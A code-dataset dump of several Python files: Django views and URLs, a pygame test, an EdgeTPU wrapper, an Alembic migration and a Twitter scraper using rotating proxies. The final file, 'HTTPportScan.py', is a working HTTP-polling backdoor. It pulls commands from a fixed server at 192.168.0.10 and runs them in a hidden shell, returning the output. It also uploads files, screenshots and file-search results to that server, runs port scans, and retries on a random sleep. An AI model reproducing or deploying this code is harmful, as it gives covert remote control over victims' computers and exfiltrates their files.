"usage_type": "name"}, {"api_name": "tests.myapp.models.Foo", "line_number": 86, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 91, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 91, "usage_type": "name"}, {"api_name": "django.db.models.signals.post_save.disconnect", "line_number": 98, "usage_type": "call"}, {"api_name": "tests.myapp.models.test_handler", "line_number": 98, "usage_type": "argument"}, {"api_name": "django.db.models.signals.post_save", "line_number": 98, "usage_type": "name"}]} {"seq_id": "12735096", "text": "from django.conf.urls import url\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nfrom main.views import RegistrationView, EmailVerificationView\n\nurlpatterns = [\n url(r'^accounts/registration/$', RegistrationView.as_view(), name='registration'),\n url(r'^accounts/email_verification/?(?P[a-z0-9\\-]+)?/$',\n EmailVerificationView.as_view(), name='email_verification'),\n url(r'^accounts/login/$', LoginView.as_view(), name='login'),\n url(r'^accounts/logout/$', LogoutView.as_view(), name='logout'),\n]\n", "sub_path": "main/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 535, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "main.views.RegistrationView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "main.views.RegistrationView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "main.views.EmailVerificationView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "main.views.EmailVerificationView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 11, "usage_type": "name"}]} {"seq_id": "625522327", "text": "from django.shortcuts import render_to_response\nfrom django.db.models import Q\nfrom django.core.context_processors import csrf\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom usuarios.models import *\nfrom gestion_cuestionarios.forms import *\nfrom django.template import RequestContext\n\n\nfrom cuestionarios.models import Cuestionario\n\n\n\ndef view_lista_cuestionarios(request):\n permisos={}\n if \"user\" in request.COOKIES:\n id=int(request.COOKIES.get(\"user\", ''))\n usuario=User.objects.get(id=id)\n userpermisos=UserPermisos.objects.get(user=usuario.id)\n permisos['issueper']=usuario.is_superuser\n permisos['isadmin']=userpermisos.admin\n permisos['issup']=userpermisos.supervisor\n permisos['isexp']=userpermisos.experto\n if userpermisos.experto: \n cuestionarios=Cuestionario.objects.filter(user=id)\n cuestionariosactivos=Cuestionario.objects.filter(~Q(pk__in=cuestionarios)& Q(activo=True))\n contexto = {'cuestionarios': cuestionarios, 'permisos':permisos, 'cuestionarios_activos':cuestionariosactivos, 'user':usuario, 'userid':id}\n elif userpermisos.supervisor:\n cuestionarios=Cuestionario.objects.all()\n contexto = {'cuestionarios': cuestionarios, 'permisos':permisos, 'user':usuario, 'userid':id}\n else:\n cuestionarios=Cuestionario.objects.filter(activo=True)\n contexto = {'cuestionarios_activos': cuestionarios, 'permisos':permisos, 'user':usuario, 'userid':id}\n mensaje=''\n \n if \"mensaje\" in request.COOKIES:\n mensaje=request.COOKIES.get(\"mensaje\", '')\n contexto['mensaje']=mensaje\n response=render_to_response(r'gestion_cuestionarios/lista_cuestionarios.html',RequestContext(request, contexto))\n response.delete_cookie(\"mensaje\")\n return response\n else:\n return HttpResponseRedirect('/')\n\ndef view_nuevo_cuestionario(request):\n if \"user\" in request.COOKIES:\n userid=int(request.COOKIES.get(\"user\", ''))\n if request.method==\"POST\":\n form = CuestionarioForm(request.POST)\n if form.is_valid():\n cuestionario=Cuestionario()\n cuestionario.nombre=form.cleaned_data['nombre']\n cuestionario.descripcion=form.cleaned_data['descripcion']\n cuestionario.user_id=userid\n cuestionario.active=False\n cuestionario.save()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n else:\n form = CuestionarioForm()\n contexto={'form':form}\n contexto.update(csrf(request))\n return render_to_response(r'gestion_cuestionarios/nuevo_cuestionario.html',contexto)\n return HttpResponseRedirect('/')\n \ndef view_eliminar_cuestionario(request):\n if 'idcuestionario' in request.GET: \n cuest_id = request.GET['idcuestionario']\n cuestionario = Cuestionario.objects.get(pk=cuest_id)\n cuestionario.delete()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n\ndef view_activar_desc_cuestionarios(request, id):\n cuestionario=Cuestionario.objects.get(pk=id)\n cuestionario.activo=not cuestionario.activo\n cuestionario.save()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n \n", "sub_path": "gestion_cuestionarios/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3379, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cuestionarios.models", "line_number": 26, "usage_type": "name"}, {"api_name": "cuestionarios.models.Cuestionario.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 26, "usage_type": "name"}, {"api_name": "cuestionarios.models.Cuestionario.objects.filter", "line_number": 27, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 27, "usage_type": "call"}, {"api_name": "cuestionarios.models", "line_number": 27, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 28, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 30, "usage_type": "name"}, {"api_name": "cuestionarios.models.Cuestionario.objects.all", "line_number": 30, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 30, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 31, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 33, "usage_type": "name"}, {"api_name": "cuestionarios.models.Cuestionario.objects.filter", "line_number": 33, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 33, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 40, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 40, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 44, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 58, "usage_type": "call"}, {"api_name": "django.core.context_processors.csrf", "line_number": 62, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 63, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 64, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects.get", "line_number": 69, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 69, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 71, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects.get", "line_number": 74, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 74, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 77, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 77, "usage_type": "call"}]} {"seq_id": "267671113", "text": "import pygame\nfrom pygame import font \nimport os\nbundle_dir = sys._MEIPASS\nimport sys\n#from images import *\n\n\npygame.init()\nx = pygame.font.get_fonts()\nfor fnts in x:\n\tif fnts == 'freesandsbold':\n\t\tprint (\"found it\")\n\nblack = (0,0,0)\n\ntextBoxImage = pygame.image.load(bundle_dir + '/images/sideMenuBox.png')\t\nlargeText = pygame.font.Font(bundle_dir + '/fonts/FreeSansBold.ttf',25)\nhldtext = \"Press Z to quit\"\n\nclock = pygame.time.Clock()\ngameDisplay = pygame.display.set_mode((800,600)) \n\ndisplaying = True\n\ndef text_objects(text, font):\n\ttextSurface = font.render(text, True, black)\n\treturn textSurface, textSurface.get_rect()\n\n#largeText = pygame.font.Font('freesansbold.ttf',25)\n\n\nwhile displaying:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.KEYUP and event.key == pygame.K_z:\n\t\t\tdiplaying = False\n\t\t\tsys.exit()\n\t\t\tpygame.quit()\n\t\t\t#quit()\n\t\t\n\n\n\tgameDisplay.fill((255, 255, 255))\n\n\tgameDisplay.blit(textBoxImage, (550,1))\t\n\tBottomSurf, BottomRect = text_objects(hldtext, largeText)\n\tBottomRect.center = ((200),(370))\n\tgameDisplay.blit(BottomSurf, BottomRect)\n\tpygame.display.flip()\n\tclock.tick(15)\n\n\t\n", "sub_path": "pyIn/pygametest1/test1.py", "file_name": "test1.py", "file_ext": "py", "file_size_in_byte": 1121, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pygame.init", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.font.get_fonts", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.font.render", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 27, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.K_z", "line_number": 35, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 49, "usage_type": "attribute"}]} {"seq_id": "40481667", "text": "\"\"\"Modified EdgeTPU classes for ease of use.\"\"\"\nimport logging\nfrom edgetpu.detection.engine import DetectionEngine # pylint: disable=import-error\n\nfrom edgetpu_server.models.candidate import LabeledDetectionCandidate\n\n_LOGGER = logging.getLogger(__name__)\n\n\n# pylint: disable=too-few-public-methods\nclass DetectionFilter:\n \"\"\"Detection filter data.\"\"\"\n\n def __init__(self, threshold, labels, labels_to_report):\n _LOGGER.warn('Initializing detection engine')\n self.threshold = threshold\n self.labels = labels\n self.labels_to_report = labels_to_report\n\n def filter_candidates(self, candidates):\n \"\"\"Filter the detection engine results.\"\"\"\n filtered_candidates = []\n for result in candidates:\n label = self.labels.get(result.label_id, None)\n if not label or label not in self.labels_to_report:\n continue\n filtered_candidates.append(LabeledDetectionCandidate(label, result))\n\n return filtered_candidates\n\n\nclass FilteredDetectionEngine(DetectionEngine):\n \"\"\"Detection engine that filters detected objects.\"\"\"\n\n def __init__(\n self,\n detection_filter,\n model_path,\n detection_lock,\n device_path=None):\n \"\"\"\n Args:\n model_path (str): Path to a TensorFlow Lite (``.tflite``) file.\n This model must be `compiled for the Edge TPU\n `_; otherwise, it simply executes\n on the host CPU.\n device_path (str): The device path for the Edge TPU this engine should use. This argument\n is needed only when you have multiple Edge TPUs and more inference engines than\n available Edge TPUs. For details, read `how to use multiple Edge TPUs\n `_.\n\n Raises:\n ValueError: If the model's output tensor size is not 4.\n \"\"\"\n _LOGGER.warn('Initializing filtered detection engine')\n DetectionEngine.__init__(self, model_path, device_path)\n self._filter = detection_filter\n self._detection_lock = detection_lock\n\n def filtered_detect_with_image(self, image):\n \"\"\"Perform object detection on an image and passed through the filter criteria.\"\"\"\n self._detection_lock.acquire()\n try:\n return self._filter.filter_candidates(\n self.detect_with_image(\n image,\n threshold=self._filter.threshold / 100,\n keep_aspect_ratio=True,\n relative_coord=False\n )\n )\n finally:\n self._detection_lock.release()\n", "sub_path": "edgetpu_server/detection_engine.py", "file_name": "detection_engine.py", "file_ext": "py", "file_size_in_byte": 2766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "edgetpu_server.models.candidate.LabeledDetectionCandidate", "line_number": 27, "usage_type": "call"}, {"api_name": "edgetpu.detection.engine.DetectionEngine", "line_number": 32, "usage_type": "name"}, {"api_name": "edgetpu.detection.engine.DetectionEngine.__init__", "line_number": 56, "usage_type": "call"}, {"api_name": "edgetpu.detection.engine.DetectionEngine", "line_number": 56, "usage_type": "name"}]} {"seq_id": "205781738", "text": "\"\"\"full datetime\n\nRevision ID: 144649a54955\nRevises: 305ace38cf61\nCreate Date: 2015-10-15 15:03:12.623726\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '144649a54955'\ndown_revision = '305ace38cf61'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ntry:\n from config import DATABASE_URL\nexcept:\n from configdist import DATABASE_URL\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n if DATABASE_URL[:5] == 'mysql':\n op.alter_column('media', 'created_at', type_=mysql.DATETIME(fsp=6), nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n if DATABASE_URL[:5] == 'mysql':\n op.alter_column('media', 'created_at', type_=mysql.DATETIME(fsp=6), nullable=True)\n ### end Alembic commands ###\n", "sub_path": "reactgur/migrations/versions/144649a54955_full_datetime.py", "file_name": "144649a54955_full_datetime.py", "file_ext": "py", "file_size_in_byte": 908, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "configdist.DATABASE_URL", "line_number": 26, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.DATETIME", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 27, "usage_type": "name"}, {"api_name": "configdist.DATABASE_URL", "line_number": 33, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 34, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.DATETIME", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 34, "usage_type": "name"}]} {"seq_id": "250162369", "text": "# Script to scrape,download and store twitter data into a MongoDB database. The data will be used to feed ML algoirthms and analyze sentiment, spam and other analysis.\n# A modified version of GetOldTweets3 library is used. A .10 sec sleep timer is added to prevent passing normal twitter API request limits. We want to not abuse our calls :).\n# Script run time is dependent on start date to current date but the average time to return 1000 tweets for one day is 40 seconds.\nimport GetOldTweets3 as tweetory\nimport mongoengine as mongo\nfrom tweet import Tweet\nimport datetime\nfrom argparse import ArgumentParser\nfrom dateutil.relativedelta import *\nfrom time import time\nimport requests\nimport random\n\n# stores data into a Schema and saves it into MongoDB. The data is the typical tweet data that can be gathered from scraping like username, likes, retweets etc... Additionally we use Textblob to store the sentiment on the tweet.\n# We're storing sentiment now because even when we do the spam classification we still want the sentiment as extra information. Spam is still data!\n\n\ndef store_data(tweet_list):\n for tweet in tweet_list:\n chirp = Tweet()\n chirp.tweet_id = tweet.id\n chirp.permalink = tweet.permalink\n chirp.date = tweet.date\n chirp.username = tweet.username\n chirp.author_id = tweet.author_id\n chirp.tweet = tweet.text\n chirp.retweets = tweet.retweets\n chirp.likes = tweet.favorites\n chirp.comments = tweet.comments\n chirp.mentions = tweet.mentions\n chirp.hashtags = tweet.hashtags\n chirp.cashtags = tweet.cashtags\n chirp.urls = tweet.urls\n try:\n chirp.save()\n except Exception as e:\n print(\"ERROR: \", e)\n continue\n print(\"Saved...\")\n\n\ndef get_proxy(previous=\"\", proxies=[]):\n if not proxies:\n with open(\"proxy-list.txt\") as f:\n proxies = f.read().splitlines()\n\n proxy = proxies[random.randrange(len(proxies))]\n\n if proxy == previous:\n return get_proxy(previous, proxies)\n return proxy\n\n\nif (__name__ == \"__main__\"):\n parser = ArgumentParser(\n description=\"Stores cryptocurrency related tweets into a MongoDB database.\")\n parser.add_argument(\n \"--max\", type=int, help=\"Value for maximum number of tweets to be returned per day. Default 1000.\", default=1000)\n parser.add_argument(\n \"--start\", type=str, help=\"Start date to retrieve tweets from in ISO format YYYY-MM-DD. Default: 2015-01-01\", default=\"2015-01-01\")\n parser.add_argument(\n \"--end\", type=str, help=\"End date to retrieve tweets up to in ISO format YYYY-MM-DD. Default: Today non inclusive.\", default=datetime.date.today().isoformat())\n parser.add_argument(\n \"--keywords\", type=str, help=\"Keywords to be used for searching\", nargs=\"*\",\n default=[\"bitcoin\", \"altcoin\", \"cryptocurrency\", \"blockchain\", \"DAO\", \"dApp\", \"decentralized app\", \"digital asset\", \"cryptotokens\", \"cryptoassets\", \"masternode\", \"proof of stake\", \"proof of work\", \"pump and dump\", \"satoshi\", \"satoshi nakamoto\", \"shilling\", \"solidity\", \"the dao\", \"tokenized\",\n \"digital economy\", \"crypto whale\", \"white paper\", \"airdrop\"])\n parser.add_argument(\n \"--db\", type=str, help=\"Databse name to be used in mongoDB\", default=\"crypto-twitter\")\n\n arguments = parser.parse_args()\n\n print(\"Welcome to Crypto Tweet Historical Database!\")\n\n try:\n print(f\"Connecting to MongoDb server {arguments.db}...\")\n mongo.connect(arguments.db)\n except Exception as e:\n print(\"Failed to connect to MongoDB server...\")\n print(\"ERROR: \", e)\n print(\"Exiting...\")\n exit()\n else:\n print(\"Connected...\")\n\n try:\n start_date = datetime.datetime.strptime(\n arguments.start, \"%Y-%m-%d\").date()\n end_date = datetime.datetime.strptime(arguments.end, \"%Y-%m-%d\").date()\n\n except Exception as e:\n print(\"Received start and end dates were not parsable. ISO format(YYYY-MM-DD) required\")\n exit()\n\n date_delta = relativedelta(days=+1)\n max_tweets = arguments.max\n search = arguments.keywords\n proxy = get_proxy()\n\n print(\n f\"Starting tweet retrieval from {start_date.isoformat()} to {end_date.isoformat()}. {max_tweets} per day per search term. For {len(search)} search terms.\")\n print(f\"Using proxy:{proxy}\")\n # For each term loop through each day and pull the historical data by scraping twitter data using GetOldTweets3 library. Requests are throttled via a 0.10 sec sleep so as not to ever exceed standard twitter\n # API limits. Average time to retrieve 1000 tweets per each day is 39sec. You can estimate the time in seconds to completion: (start_date - today_date) * 39sec/1000tweet * len(search_terms).\n for term in search:\n while (start_date != end_date):\n since = start_date.isoformat()\n until = (start_date + date_delta).isoformat()\n\n print(\n f\"Retrieving tweets for keyword {term.upper()} between {since} and {until}.\")\n print(f\"Using proxy:{proxy}\")\n\n tweetCriteria = tweetory.manager.TweetCriteria().setQuerySearch(\n term).setSince(since).setUntil(until).setMaxTweets(max_tweets).setLang(\"en\")\n t0 = time()\n try:\n tweet_list = tweetory.manager.TweetManager.getTweets(\n tweetCriteria=tweetCriteria, proxy=proxy)\n except Exception as e:\n print(\"Failed in retrieving tweets...\")\n print(\"ERROR: \", e)\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n print(\"Retrying last search..\")\n print(\n f\"Retrieving tweets for keyword {term.upper()} between {since} and {until}\")\n t0 = time()\n try:\n tweet_list = tweetory.manager.TweetManager.getTweets(\n tweetCriteria=tweetCriteria, proxy=proxy)\n except Exception as e:\n print(\"Failed in retrieving tweets...\")\n print(\"ERROR: \", e)\n else:\n print(\n f\"{len(tweet_list)} tweets retrieved in {time() - t0} seconds. Storing into database . . .\")\n store_data(tweet_list)\n start_date = start_date + date_delta\n else:\n print(\n f\"{len(tweet_list)} tweets retrieved in {time() - t0} seconds. Storing into database . . .\")\n store_data(tweet_list)\n start_date = start_date + date_delta\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n\n print(\n f\"Retrieved tweets stored for {term.upper()}...\\nContinuing...\\n\")\n # reset start_date back to original value if not the while loop will not initiate do to a false condition being met.\n start_date = datetime.datetime.strptime(\n arguments.start, \"%Y-%m-%d\").date()\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n print(\"All search terms saved...\\nExiting...\\nGoodbye.\")\n", "sub_path": "CreateDatabase/create-db.py", "file_name": "create-db.py", "file_ext": "py", "file_size_in_byte": 7233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "tweet.Tweet", "line_number": 20, "usage_type": "call"}, {"api_name": "tweet.id", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tweet.permalink", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tweet.date", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tweet.username", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tweet.author_id", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tweet.text", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tweet.retweets", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tweet.favorites", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tweet.comments", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tweet.mentions", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tweet.hashtags", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tweet.cashtags", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tweet.urls", "line_number": 33, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 47, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 62, "usage_type": "attribute"}, {"api_name": "mongoengine.connect", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 88, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 88, "usage_type": "attribute"}, {"api_name": "GetOldTweets3.manager.TweetCriteria", "line_number": 113, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager", "line_number": 113, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 115, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager.TweetManager.getTweets", "line_number": 117, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager", "line_number": 117, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 127, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager.TweetManager.getTweets", "line_number": 129, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager", "line_number": 129, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 136, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 150, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "attribute"}]} {"seq_id": "423701732", "text": "import requests\r\nimport subprocess\r\nimport time\r\nimport os\r\nimport random\r\nimport socket\r\nfrom PIL import ImageGrab as imagegrab\r\nimport tempfile\r\nimport shutil\r\n\r\ndef subprocess_args(include_stdout=True):\r\n shell = True\r\n if hasattr(subprocess, 'STARTUPINFO'):\r\n si = subprocess.STARTUPINFO()\r\n si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\r\n env = os.environ\r\n else:\r\n si = None\r\n env = None\r\n if include_stdout:\r\n ret = {'stdout': subprocess.PIPE}\r\n else:\r\n ret = {}\r\n ret.update({'stdin': subprocess.PIPE,\r\n 'stderr': subprocess.PIPE,\r\n 'startupinfo': si,\r\n 'env': env,\r\n 'shell': shell})\r\n return ret\r\n\r\ndef changeDirectory(directory):\r\n os.chdir(directory)\r\n requests.post(url = 'http://192.168.0.10',data = ('[+] CWD is ' + os.getcwd()))\r\n\r\ndef grabfile(path):\r\n if os.path.exists(path):\r\n rpath = os.path.realpath(path)\r\n url = 'http://192.168.0.10/store'\r\n files = {'file': open(path, 'rb'),'path': rpath}\r\n r = requests.post(url, files=files)\r\n else:\r\n post_response = requests.post(url='http://192.168.0.10',data='[-] Not able to find the file.')\r\n\r\ndef takescreenshot():\r\n dirpath = tempfile.mkdtemp()\r\n path = dirpath + '\\img.jpg'\r\n imagegrab.grab().save(path, \"JPEG\")\r\n url = 'http://192.168.0.10/store'\r\n files = {'file': open(path, 'rb'),'path': 'screencap.jpg'}\r\n r = requests.post(url, files=files)\r\n files['file'].close()\r\n shutil.rmtree(dirpath)\r\n\r\ndef search(path,ext):\r\n list = ''\r\n for dirpath, dirname, files in os.walk(path):\r\n for file in files:\r\n if file.endswith(ext):\r\n list = list + '\\n' + os.path.join(dirpath,file)\r\n requests.post(url='http://192.168.0.10',data=list)\r\n\r\ndef scanner(ip,ports):\r\n scan_result = ''\r\n for port in ports.split(','):\r\n try:\r\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n output = sock.connect_ex((ip,int(port)))\r\n\r\n if output == 0:\r\n scan_result = scan_result + \"[+] Port \" + port + \" is open.\\n\"\r\n else:\r\n scan_result = scan_result + \"[+] Port \" + port + \" is closed or the host is not reachable.\\n\"\r\n sock.close()\r\n except Exception as e:\r\n pass\r\n requests.post(url='http://192.168.0.10',data=scan_result)\r\n \r\ndef connect():\r\n while True:\r\n req = requests.get('http://192.168.0.10')\r\n command = req.text\r\n\r\n if \"terminate\" in command:\r\n return 1\r\n elif 'cd ' in command:\r\n code,directory = command.split()\r\n changeDirectory(directory)\r\n elif 'grab' in command:\r\n grab,path = command.split(\" * \")\r\n grabfile(path)\r\n elif 'screencap' in command:\r\n takescreenshot()\r\n elif 'search' in command:\r\n command = command[7:]\r\n print(command)\r\n path,ext = command.split('*')\r\n search(path,ext)\r\n elif 'scan' in command:\r\n command = command[5:]\r\n ip,ports = command.split(':')\r\n scanner(ip,ports)\r\n else:\r\n CMD = subprocess.Popen(command,**subprocess_args(True))\r\n post_response = requests.post(url='http://192.168.0.10', data=CMD.stdout.read())\r\n post_response = requests.post(url='http://192.168.0.10', data=CMD.stderr.read())\r\n\r\n time.sleep(3)\r\n\r\ndef main():\r\n while True:\r\n try:\r\n if connect() == 1:\r\n break\r\n except:\r\n sleep_for = random.randrange(1,10)\r\n time.sleep(sleep_for) #Sleep for a random time between 1 and 10 seconds\r\n #time.sleep(sleep_for * 60) #Sleep for a random time between 1 and 10 minutes\r\n pass\r\n \r\nmain()\r\n", "sub_path": "3/HTTPportScan.py", "file_name": "HTTPportScan.py", "file_ext": "py", "file_size_in_byte": 3905, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "subprocess.STARTUPINFO", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.STARTF_USESHOWWINDOW", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 21, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 24, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 33, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 42, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.ImageGrab.grab", "line_number": 47, "usage_type": "call"}, {"api_name": "PIL.ImageGrab", "line_number": 47, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 50, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 52, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": 